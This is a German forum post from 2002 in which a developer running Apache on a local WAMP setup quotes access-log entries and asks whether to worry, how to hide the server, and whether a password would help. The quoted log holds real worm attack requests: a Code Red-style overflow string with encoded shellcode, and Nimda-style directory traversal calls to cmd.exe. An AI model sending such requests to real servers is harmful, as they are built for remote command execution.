Andreas Gaisbauer
Erfahrenes Mitglied
Hallo,
ich habe bei mir zu Entwicklungszwecken einen Apache2 laufen - stinknormales WAMP halt. Ich hab mir gestern mal die Access logfile´s vom Apache angesehen...
und so weiter... nun meine Fragen:
1) Kann / Soll ich das ignorieren?
2) Kann ich den Apache "verstecken", so dass er von außen nicht erreichbar ist?
3) Würde mir hier jetzt ein Passwort auf dem DocumentRoot erwas bringen?
ciao Andreas
ich habe bei mir zu Entwicklungszwecken einen Apache2 laufen - stinknormales WAMP halt. Ich hab mir gestern mal die Access logfile´s vom Apache angesehen...
Code:
194.69.27.71 - - [31/Jan/2002:17:18:02 +0100] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 309
62.251.148.88 - - [31/Jan/2002:17:42:59 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
62.251.148.88 - - [31/Jan/2002:17:43:02 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 -
62.251.148.88 - - [31/Jan/2002:17:43:04 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
62.251.148.88 - - [31/Jan/2002:17:43:08 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
62.251.148.88 - - [31/Jan/2002:17:43:12 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
62.251.148.88 - - [31/Jan/2002:17:43:15 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
62.251.148.88 - - [31/Jan/2002:17:43:19 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
62.251.148.88 - - [31/Jan/2002:17:43:24 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
62.251.148.88 - - [31/Jan/2002:17:43:27 +0100] "GET /scripts/..%c1%...
und so weiter... nun meine Fragen:
1) Kann / Soll ich das ignorieren?
2) Kann ich den Apache "verstecken", so dass er von außen nicht erreichbar ist?
3) Würde mir hier jetzt ein Passwort auf dem DocumentRoot erwas bringen?
ciao Andreas